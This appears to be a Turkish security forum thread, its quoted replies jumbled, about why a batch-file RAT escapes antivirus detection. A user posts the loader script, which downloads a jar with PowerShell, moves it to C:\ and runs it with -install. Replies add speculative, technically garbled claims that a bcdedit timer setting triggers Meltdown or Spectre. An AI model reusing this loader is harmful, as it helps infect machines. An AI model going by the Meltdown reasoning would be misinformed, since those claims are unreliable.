- Katılım
- 4 Nisan 2020
- Mesajlar
- 5.186
- Makaleler
- 11
- Çözümler
- 281
Daha fazla
- Cinsiyet
- Erkek
Bu BAT dosyası şeklinde hazırlanan RAT'ı antivirüsler neden tespit edemiyor?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Segment Heap
kayıt girdisine erişerek izole bellek alanı için değişiklik yapıyor, ki bu da SegmentationFault tetiklemesine sebep olarak bir nevi yapay "Meltdown" yaratıyor.Güzel soru. Bu sorunun cevabı Beni de ilgilendiriyor.
Bu BAT dosyası şeklinde hazırlanan RAT'ı antivirüsler neden tespit edemiyor?
Bu BAT dosyası şeklinde hazırlanan RAT'ı antivirüsler neden tespit edemiyor?
Aslında bu terimleri de duydum. Neyi nasıl yapılacağı konusunda burada cevap alamayacağımı da iyi biliyorum.Büyük ihtimalle stub enjekte edilip Crypter ile şifrelenmişdir.
Hocam kodu burada paylaşmam bir sorun teşkil eder mi?İlginç, 12 mayısta görülmesine rağmen henüz bir AV tarafından tespit edilememiş. YARA kural eşleşmesi var kendini oradan ele veriyor. Net bir şey söylemek için kodu incelemem gerekli.
Hocam kodu burada paylaşmam bir sorun teşkil eder mi?
Peki ya bunun sistemden arındırılma durumu nasıldır hocam?Bu arada, noverify kullanarak doğrulamaları atlatıyor, TCP ayarlarına yoğun müdahalesi var, muhtemelen bundan dolayı tespit edilemiyor.
@echo off
java -noverify -jar deneme.jar
bcdedit /set useplatformtick yes
powershell Invoke-WebRequest "deneme2.jar"" -OutFile
Bulaşan zararlıya bağlı, "Gold_Hit__EDIT_BY_MART_.jar" isimli dosyanın ne olduğuyla ilgili bir fikrim yok, ayrıca -noverify kullanılması sadece dosya doğrulamasını atlatır. AV taramalarını bypass etmemeli.Peki ya bunun sistemden arındırılma durumu nasıldır hocam?
Zararlıların nasıl antivirüsü atladığıyla ilgili çeşitli forum sitelerinde ve Discord üzerinde araştırma yapıyordum. Bir Discord sunucusunda bu BAT ile yazılan RAT'ın nasıl tespit edilemez hale geleceğine dair tutorial tarzı bir şey sunmuşlar. Duyuru olarak paylaştıktan hemen sonra paylaştıkları kod bloğunu sildiler. Tam hali aşağıdaki gibi:Bulaşan zararlıya bağlı, "Gold_Hit__EDIT_BY_MART_.jar" isimli dosyanın ne olduğuyla ilgili bir fikrim yok, ayrıca -noverify kullanılması sadece dosya doğrulamasını atlatır. AV taramalarını bypass etmemeli.
Kodun bu kısmına göre, indirilen paket - ki burada "deneme2.jar" olarak tanımlı - bir Java sanal makinesinde çalıştırıldığı için izole alan oluşturup AV taramasından kaçabilir, fakat yürütme için mutlaka AV taraması gerekli.
Gözüme takılan nokta, useplatformtick kısmı oldu, Meltdown ve Spectre açıklarından işlemci zamanlayıcısı ile kernel arasındaki bariyeri kaldırıp AV yazılımlarını bypass edebilmek mümkündü, eğer attığınız dosya bu alanda bir işlem yapıyorsa karşımızda sıfırdan yeni bir Meltdown&Spectre zafiyeti mevcut demektir. Dosyaya nereden eriştiniz? Bat dosyasını siz mi yazdınız yoksa internetten mi buldunuz?
Tam sonuç için dediğim gibi kodları incelemem gerekli, attığınız kodlarda tek sorun yaratabilecek kısım useplatformtick, AV yazılımlarının çalışmasına da etki edebilir, CPU bariyerini aşarak kernel iletişimini de kırabilir.
@echo off
java -noverify -jar babaproxd.jar
bcdedit /set useplatformtick yes
powershell Invoke-WebRequest "qwewqe.jar"" -OutFile "%temp%\Gold_Hit__EDIT_BY_MART_.jar"
move "%temp%\babaproxd.jar" "C:\"
"C:\babaproxd.jar" -install
Bu sitenin çalışmasını sağlamak için gerekli çerezleri ve deneyiminizi iyileştirmek için isteğe bağlı çerezleri kullanıyoruz.